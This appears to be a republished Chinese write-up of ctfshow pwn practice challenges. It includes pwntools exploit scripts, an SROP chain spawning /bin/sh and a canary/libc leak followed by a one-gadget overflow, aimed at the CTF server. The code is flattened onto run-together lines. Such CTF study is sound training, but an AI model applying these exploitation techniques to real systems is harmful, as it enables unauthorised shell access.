PWN-PRACTICE-CTFSHOW-7

• • 大吉大利杯-easyrop
  • 大牛杯-guess
  • 吃雞杯-win_pwn
  • 吃雞杯-easy_canary

大吉大利杯-easyrop

棧溢出，SROP

# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" context.arch="amd64" #32位和64位的sigframe結構不同，需要指定處理器架構 #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28078) elf=ELF("./pwn1")syscall=0x4000DC #syscall gadget buf=0x6000E0 #buf address pop_rax=0x4000DB #pop rax;syscall gadgetsigframe = SigreturnFrame() #sigreturn系統調用結束后，由pop恢復的寄存器值，可指定 sigframe.rax = constants.SYS_read sigframe.rdi = 0 sigframe.rsi = buf#輸入數據的地址 sigframe.rdx = 0x300 sigframe.rsp = buf#這里設置新的棧頂與read輸入的數據地址相同，ret從棧頂彈出一個地址到rip，于是控制了下一條執行指令的地址 sigframe.rip = syscallio.recvuntil("Welcome to DJB easyrop!\n") #正常輸入數據的地址與返回地址在棧上的偏移為64，填充后rop #pop_rax將rax賦值為15，然后會syscall，即sigreturn系統調用，將sigframe里設置的寄存器值賦為新的寄存器值 #新的rip為syscall，rax為constants.SYS_read，于是再次執行read系統調用，輸入數據的地址為buf payload="a"*64+p64(pop_rax)+p64(15)+str(sigframe) io.send(payload)sigframe = SigreturnFrame() sigframe.rax = constants.SYS_execve sigframe.rdi = buf+0x120 # "/bin/sh\x00"的地址 sigframe.rsi = 0 sigframe.rdx = 0 sigframe.rip = syscall#上面再次執行的read系統調用，輸入數據的地址為buf，因為第一個sigreturn設置棧頂rsp也為buf，于是ret要從buf處彈出一個地址到rip，，作為下一條指令的地址，于是輸入到buf的數據首先為pop_rax和新的sigframe payload=p64(pop_rax)+p64(15)+str(sigframe) #由ret回到pop rax;syscall 執行sigreturn，給寄存器賦值，然后再執行execve系統調用，rdi為"/bin/sh\x00"的地址 payload=payload.ljust(0x120,"\x00")+"/bin/sh\x00" io.send(payload)io.interactive()

大牛杯-guess

nc連上去，直接輸入65538即可得到flag

吃雞杯-win_pwn

exe程序，運行后隨便輸入一個長度為169的字符串，然后回車，即可得到flag

吃雞杯-easy_canary

格式化字符串漏洞泄露canary和libc基地址，然后棧溢出覆蓋返回地址到one-gadget

# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28140) elf=ELF("./pwn1")number=0x6B8B4567 io.sendlineafter("lucky number:\n",p32(number))#遠程libc libc=ELF("./libc6_2.23-0ubuntu10_amd64.so")#泄露canary和libc基址 payload="%15$p,%21$p" io.sendline(payload) io.recvuntil("0x") canary=int(io.recv(16),16) print("canary=="+hex(canary)) io.recvuntil("0x") __libc_start_main=int(io.recv(12),16)-(0x20830-0x20740) libc_base=__libc_start_main-libc.sym["__libc_start_main"] print("libc_base=="+hex(libc_base)) ogg=libc_base+0x45216payload="a"*72+p64(canary)+"b"*8+p64(ogg) io.sendline(payload)io.interactive() 創作挑戰賽新人創作獎勵來咯，堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的PWN-PRACTICE-CTFSHOW-7的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。